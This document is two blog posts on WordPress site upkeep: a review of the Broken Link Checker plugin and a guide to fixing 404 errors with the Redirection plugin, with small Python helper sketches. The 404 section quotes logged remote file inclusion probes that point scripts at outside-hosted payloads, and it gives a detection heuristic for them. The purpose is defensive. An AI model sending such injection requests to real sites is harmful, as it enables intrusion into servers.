Broken Link Checker plugin for WordPress (review)

(Reading time: 7 – 11 minutes)

Broken links frustrate readers and make Google think you are a bad blogger. You will want to eliminate broken links from your blog, and keep them at bay.

Broken links come in two cases:

  1. There’s a bad link on your side, perhaps a typo or misspelling in the href attribute of your link.
  2. The web page has moved or disappeared on the target site.

Both cases apply to internal links to your blog posts and pages, and to external or outbound links targeting web pages elsewhere.

For Case 1, you may need to do a little sleuthing.

Sometimes the problem is obvious, sometimes it’s subtle. The first place to start is to copy the URL directly from the href attribute into your web browser and see what happens.

For example, I just fixed a URL that looked like this: http:http://somedomain.com/. Probably my fault, a cut and paste error.
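
A doubled scheme like that one is easy to catch mechanically. Here is a minimal sketch in Python, assuming you have the href values as plain strings; the function name `href_problems` and the wording of the problem labels are made up for illustration, and the checks cover only a couple of common paste errors.

```python
from urllib.parse import urlparse


def href_problems(href):
    """Return a list of human-readable problems found in one href value."""
    problems = []
    stripped = href.strip()
    if stripped != href:
        problems.append("leading or trailing whitespace")

    parsed = urlparse(stripped)
    if parsed.scheme in ("http", "https") and not parsed.netloc:
        # Whatever follows the first "scheme:" should start with "//host".
        rest = stripped[len(parsed.scheme) + 1:]
        if rest.lower().startswith(("http:", "https:")):
            problems.append("scheme is doubled")
        else:
            problems.append("no host name after the scheme")
    return problems


# Example: the cut and paste error described above.
print(href_problems("http:http://somedomain.com/"))
```

Relative links such as "/about/" pass through untouched, because the sketch only complains about absolute http and https URLs that have no host.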

For Case 2, links expire for any number of reasons.

On WordPress.com or Blogger blogs, the owner may delete the entire site. The blog or website owner may let the domain name expire, sometimes by accident, after which the registrar or a new owner parks the domain.

Usually there is little you can do except notify the site owner (if you can find him or her) and remove the link from your blog post.

However, if the link really is useful, you may be able to find the same web page at a different URL. Perhaps the site owner moved it for some reason, or a redirect was deleted. Google is your friend here.

Find and fix broken links

There’s a lot of ways to find broken links. You can examine all the pages on your blog, and click through on the links. But that’s so last millennium, and as Johnson Yip notes,

Clicking every link in your blog can be very time consuming for finding broken links.

Boring.

Instead, here’s three ways to automate that task:

  1. Use a web service such as the Link Checker – The W3C Markup Validation Service.

    Using any W3C tool is a smart idea, at least on an occasional basis. The W3C doesn’t have any commercial interest, and provides a neutral, third party analysis of your site. You may find that the W3C tools catch problems and issues other tools miss.

  2. Use Google Webmaster tools to investigate site crawl errors.

    I recommend checking your site with Webmaster tools no matter what, because you see what Google sees. No guesswork.

  3. For WordPress users, install the Broken Link Checker plugin.

I really like using the Broken Link Checker plugin for WordPress, and it’s my first defense against broken links.

Let’s take a closer look at this highly useful plugin.

Broken Link Checker features

First, here’s a list of important features:

  • Detects links that don’t work, including 404 Not Found, 410 Gone, 403 Forbidden, Connection Failed, 500 Internal Server Error, Timeout, and Server Not Found (DNS issue).
  • Detects missing images.
  • Periodically checks links in posts, pages, comments and the blogroll. Checking comments is especially important, and you will see after a few months that many of your commenters’ web sites will vanish! Unlink them.

    Trackbacks are also included in comment link checking.

  • New and modified entries are checked ASAP.
  • Notifies you on the Dashboard if any problems are found.
  • Lets you edit all instances of a specific link at once.
  • Gives you a list of all links ever posted on your site, with the ability to search and filter it.
  • Lets you apply custom CSS styles to broken and removed links.
  • Highly configurable.
  • Bug reporting and feature request forum! Forums are a lot of work; take this as a commitment from the plugin author.
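
To make the failure categories in the first bullet concrete, here is a rough sketch of a single link check in Python using only the standard library. It is not how the plugin works internally (the plugin is written in PHP, and I haven't read its source); the function name `check_link`, the injectable `opener` parameter, and the choice of a HEAD request are all assumptions made for illustration. Some servers reject HEAD requests, so a real checker would likely fall back to GET.

```python
import socket
import urllib.error
import urllib.request


def check_link(url, opener=urllib.request.urlopen, timeout=10):
    """Return (ok, label) for one URL.

    `opener` defaults to urllib's urlopen; it is a parameter only so the
    function can be exercised without touching the network.
    """
    request = urllib.request.Request(url, method="HEAD")
    try:
        with opener(request, timeout=timeout) as response:
            return True, str(response.status)
    except urllib.error.HTTPError as exc:
        # The server answered, but with an error status (404, 410, 403, 500...).
        return False, f"{exc.code} {exc.reason}"
    except urllib.error.URLError as exc:
        # No usable answer at all: work out why from the wrapped reason.
        if isinstance(exc.reason, socket.timeout):
            return False, "Timeout"
        if isinstance(exc.reason, socket.gaierror):
            return False, "Server Not Found"
        return False, "Connection Failed"
    except socket.timeout:
        # Raised directly when the read (not the connect) times out.
        return False, "Timeout"
```

Calling `check_link("http://example.com/")` performs one real request; looping over every link on a blog this way is exactly the chore the plugin automates.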

Benefit: Broken Link Checker will save you a massive amount of time eliminating broken links.

Website In A Weekend has 5353 links (October 3, 2010).

Imagine checking all of those links by hand, or by submitting your blog pagewise to link checking services. Or even if you paid for a full-scale analysis for your blog, you would still have to dig into the posts and pages containing broken links one at a time.

Instead, the plugin saves you time by collecting every link which needs fixing into a simple, intuitive web interface.

Note: when you first install Broken Link Checker, it won’t have any results to report. The plugin needs to run for a while on your blog to collect data. If you prefer to keep your plugin count to an absolute minimum, install Broken Link Checker, let it run for a couple of weeks, then clean up the mess. Uninstall it after you clean up, and reinstall it when you need it again.

Depending on your publishing schedule, repeat this link cleanup monthly to quarterly and you should be in good shape.

Case study: Gordie Rogers

Long time readers (bofem) will recognize – and welcome back – Gordie Rogers. Gordie used to publish a lifestyle design website and blog, but wasn’t able to make the numbers work at the time. So he took a bit of a break, and now he’s back with Personal Development X.

Note: Gordie brings up a good point in the comments. If the broken link is “otherwise good,” use Broken Link Checker’s “ignore” feature instead of unlinking or deleting.

Gordie has loads of comments here on Website In A Weekend, all pointing to the old lifestyle design articles, and all currently broken.

Let’s give Gordie a hand. We’ll fix the broken links on Website In A Weekend, and get Gordie a few dozen (dofollow) backlinks for his new website. Here’s how we’ll do it:

  1. First, we’ll replace the lifestyle design URL in all of his comments.
  2. Then we’ll unlink, for now, all the CommentLuv links returning HTTP 404 errors.

This can be done fast, takes maybe 10 minutes. Here’s a 3 minute screencast to show you exactly how it works:

Brief excursion: canonical plugins

WordPress is sufficiently mature and has a sufficiently large user base (8% of the whole web) that it makes sense to maintain a “best of breed” list of plugins worth following in detail. Such plugins are characterized by:

  1. Usefulness.
  2. Good design.
  3. Maturity.

Broken Link Checker meets these criteria, so it’s on the Official Website In A Weekend list. Expect more on this topic of canonical plugins, and how such a list fits into a “micro-niche” strategy for developing authority.

While I’m at it, here’s a few words from Janis Elsts, the plugin author.

µ-interview with Janis Elsts

WIAW: What was your main motivation for developing BLC? Frustration? The challenge of coding? Something else?

JE: I must admit I don’t really remember what the initial motivation was. I guess it was one of those lucky ideas, stumbling upon an unfulfilled need.

WIAW: How long have you been working on BLC?

JE: The first version of the plugin was released on 5th August, 2007. So, just over three years now.

WIAW: Offering a Pro version indicates you are committed to BLC as a long(er) term project. Are you comfortable mentioning one or two features users might expect in the future?

JE: A few things that I would like to add, eventually:
* Link suggestions, i.e. automatically finding alternatives for broken links.
* Support for internationalized domain names.
* Bulk URL editing.

As you probably know, there is a dedicated forum where users can suggest new features and provide feedback:
Broken Link Checker forum.

Most likely, any new features (once implemented) will only be available to users who’ve purchased the Pro version.

Speaking of the Pro version…

Help keep Broken Link Checker up-to-date

Broken Link Checker also has a Pro version for the very reasonable price of $4.99 US (October 3, 2010).

The Pro version of Broken Link Checker is available from WP Plugins. It’s advertised through the plugin with a screen options tab (as of October 3, 2010).

By the way, I prefer to promote professional and paid versions of blogging tools, including plugins, and here’s why: it means the author of the plugin is taking his work seriously enough to realize his effort should be compensated. That reassures me that the time I take learning such tools won’t be wasted. Because it’s just horrible to sink hours, days, weeks or more of your life into a technology that dies. Paying a few bucks to help keep worthy technology alive and growing just makes sense.

Anyway, there you are, a great plugin and a few other ways to check broken links. Here’s a few questions for you:

Are you regularly checking for broken links?

If so, how?

If not, why not?

Off to the comments!

Using Redirection Plugin For 404 Errors on WordPress Blogs

(Reading time: 6 – 10 minutes)

When someone comes to your website, and asks for a webpage that doesn’t exist, the webserver serves up a 404 ERROR PAGE NOT FOUND. Webpages get “lost” for various reasons, some of which you, the WordPress operator, have no control over:

  1. You may have deleted a page that is still a popular search result.
  2. You may have changed the page’s permalink without redirecting.
  3. Someone may have made a typo in the link. Could have been you, could have been someone else. If it’s a link in a popular webpage, you’re going to get a lot of 404 errors.
  4. You may be the subject of systematic hacking attacks.

You have several ways to attack 404 issues:

  1. Create a webpage dedicated to handling 404 errors, and tell the server to deliver this page with the 404 error. All WordPress administrators should read the WordPress Codex page on Creating 404 Pages.
  2. Smarter bears use the “Smart 404” plugin, which customizes the 404 page to deliver links to pages returned from using the WordPress search function with the incoming URL. Smart 404 might be a good topic for a future article, or a newsletter. Subscribe to RSS and the newsletter and you won’t miss it.
  3. Add a 301 redirection for the bad link, pointing it to a good link. Redirection handling 404 errors is the topic of this post, and we’ll use the Urban Giraffe Redirection plugin. If you haven’t installed it, now is a good time. I’ll wait.

Once you have the Redirection plugin installed, read the instructions on the plugin home page. Then read and understand all 12 pages of comments and every thread on the discussion… then you will know far more about handling bad webpages than 99% of WordPress operators.

But that’s a lot of work.

If you’re in a hurry (who isn’t?), here’s a few tips on getting started really fast. Once you’re underway, and have days or weeks of 404 log entries, THEN go back and read the plugin homepage and comments very carefully.

Systematically eliminate 404 errors

The key to handling 404 errors is learning what they mean, then getting rid of them. Here’s my system, which will work for you as well:

  1. Pick one error
  2. Figure out what it is (wrong URL, hacking attempt, etc.)
  3. Fix it if necessary
  4. Search for that error and delete the rest of the errors just like it
  5. Move to the next error
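
Steps 1 and 4 go faster if you know which bad URLs show up most often. Here is a small Python sketch, assuming you have exported the requested URLs from your 404 log as a list of strings; the export step and the function name `summarize_404s` are assumptions, not something the Redirection plugin provides in this form.

```python
from collections import Counter
from urllib.parse import urlsplit


def summarize_404s(requested_urls):
    """Count 404 hits per path (query string ignored), most frequent first."""
    paths = (urlsplit(url).path for url in requested_urls)
    return Counter(paths).most_common()


# Hypothetical log entries, for illustration only.
log = [
    "/favicon-artcle/",
    "/favicon-artcle/?utm=x",
    "/head.php?adresa=http://example.com/x.jpg?",
    "/favicon-artcle/",
]
for path, hits in summarize_404s(log):
    print(hits, path)
```

Grouping by path means one redirection (or one "ignore, it's a hacker" decision) clears a whole batch of log entries at once.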

Let’s find an error. Click on “Tools >> Redirection” to get to the redirection page, then Modules from the navigation links across the top of the Redirection page:
Click on "Hits" (red box) to see 404 error log

That was easy. Looks below like a bad link to the Favicon article is floating around the web somewhere. I vaguely recall changing the permalink… without adding a redirection…

…brief digression here. Take the time to do this stuff right the first time. It’s not that hard. Once the search engines grab your content and index it, these completely preventable errors are going to plague you for months or years.

Ok, continuing… top of the log shows a favicon post:

favicon article has a bad permalink floating around the web somewhere.

Click on the bad link, it will come up as a 404 page. Leave this page handy, we’ll use it to check the new 301 redirection. Next, find the correct URL. I usually have to run a search to find it. Leave this open in a window as well. Now navigate to the Redirects link on the administration page:

Adding 301 redirection for bad favicon link

Click “Add Redirection.”

Now go back to the 404 page served on the bad link. Refresh the page. If the redirection works, you should get the correct page. If it doesn’t work, check all your links carefully, there’s a typo or something equally trivial floating around.

That’s all there is to it.

Tips for creating redirections

Trailing slashes: you MUST get the trailing slashes right. I recently lost many click-throughs because I added a trailing slash to a redirection: “/wordpress101/” is not the same as “/wordpress101”. That trailing slash matters. It 404'ed them all. I found it within 2 hours of posting, but a lot of damage was already done. I would have saved myself some grief had I tested the link before publishing.
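
Here is a tiny Python illustration of why the slash matters when a redirect rule is matched as an exact string. This is a sketch of the general idea only, not the Redirection plugin's actual matching code; the target URL and both function names are hypothetical.

```python
# Hypothetical rule: the source was entered WITH a trailing slash.
REDIRECTS = {"/wordpress101/": "/wordpress-101-getting-started/"}


def resolve(path, redirects):
    """Exact-match lookup: return the 301 target, or None (a 404)."""
    return redirects.get(path)


def resolve_lenient(path, redirects):
    """Same lookup, but ignore trailing slashes on both rule and request."""
    normalized = {src.rstrip("/") or "/": dst for src, dst in redirects.items()}
    return normalized.get(path.rstrip("/") or "/")


print(resolve("/wordpress101/", REDIRECTS))         # matches the rule
print(resolve("/wordpress101", REDIRECTS))          # no match, so a 404
print(resolve_lenient("/wordpress101", REDIRECTS))  # matches either way
```

Whether you normalize like `resolve_lenient` or simply add both variants as separate rules is a design choice; either way, test both forms of the URL before you publish the link.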

If you have a really bad permalink on a blog post, consider tightening up the permalink and adding a redirection from the old to the new. Then watch your 404 log and your 301 redirection log very carefully to make sure everything is working correctly.

Featured posts can be redirected using very short slugs. Add the slug to the 301 log, give it a target, test it, then watch your 301 and 404 logs to make sure it’s working.

Put your 404 log into your RSS feed. It’s easy. See the screenshot below of the Redirection admin page. Click the [Modules] link (green box) to display the WordPress, Apache and 404 Error modules. Right click and copy link for the [RSS] link; paste that link into your RSS reader. I use Google Reader, works great.

Redirection has powerful HTTP 404 Error monitoring

404 Fear and Loathing

Examining your 404 log can be terrifying. Adding 301 links as discussed above isn’t too difficult, and is easy to understand. Attacks by malicious hackers are a whole ‘nother story. Here’s a few of the odd things you may find in your 404 log after a week or two:

  1. /extending-wordpress//includes/header.php?c_temp_path=http://www.leeminhothailand.com/board/admin.txt????

    What the hell is that?

    I poked around a bit, and it turns out that Lee Min Ho is a popular Korean heartthrob. The “leeminhothailand” resolves to a Lee Min Ho Thailand Fan Club home page, and the “admin.txt????” resolves to a hack: “arage was here” where Mr Arage extracts the host details (e.g., uname) for the web page. Presumably, since this was logged in my 404 log, his attack wasn’t successfully launched from Website In A Weekend. You may or may not wish to extend a birthday greeting to Mr Lee.

  2. Here’s another one: /head.php?adresa=http://www.stmaryofthecataract.com/images/save.jpg?

    Our hacker here attempted to pass the url to the WordPress head.php file for further processing. head.php wasn’t interested, and declined with a 404 error.

    Somebody’s been a busy bee, check out this Google search on the St. Mary’s of the Cataract URL. Nasty.

  3. Requests for the files owssvr.dll and cltreq.asp aren’t attacks to compromise security. These are used by IE to see if there is a web discussion forum that is compatible with IE. If you are being served by an Apache server, these files won’t exist. This is not a problem.
  4. Requests ending in a ?filename.php probably indicate an exploit, likely long since closed for current versions of WordPress. See issue 5427 and changeset 11596 for more information.
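
The four patterns above can be sorted roughly by script. What follows is a hedged Python sketch: the labels "benign", "probe" and "review" and the function name `triage` are my own, the rules are simple heuristics drawn from the examples in this list, and they will miss plenty of other attack styles.

```python
from urllib.parse import parse_qsl, urlsplit

# Files that IE requests on its own; harmless on an Apache server.
BENIGN_FILES = ("owssvr.dll", "cltreq.asp")


def triage(request_url):
    """Roughly label one 404 log entry as 'benign', 'probe' or 'review'."""
    parts = urlsplit(request_url)
    filename = parts.path.rsplit("/", 1)[-1].lower()
    if filename in BENIGN_FILES:
        return "benign"

    # A query parameter whose value is itself a URL suggests an attempt
    # to make a script load a remote file.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        if value.lower().startswith(("http://", "https://", "ftp://")):
            return "probe"

    # Requests of the form "?filename.php".
    if parts.query.lower().endswith(".php"):
        return "probe"

    # Anything else deserves a human look: it may just be a bad link.
    return "review"


print(triage("/head.php?adresa=http://example.com/images/save.jpg?"))
```

Anything labeled "review" is where your 301 redirections come from; entries labeled "probe" can usually be deleted from the log once you have confirmed they returned a 404.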

Your best bet for heading off hackers is to keep your WordPress installation reasonably up to date, and implement common security precautions such as deleting the “admin” user. Anyone really determined to hack your site will be hard to stop… fortunately, most hackers don’t want to damage your site, they simply want to use it without anyone finding out. Take precautions, but don’t worry too much.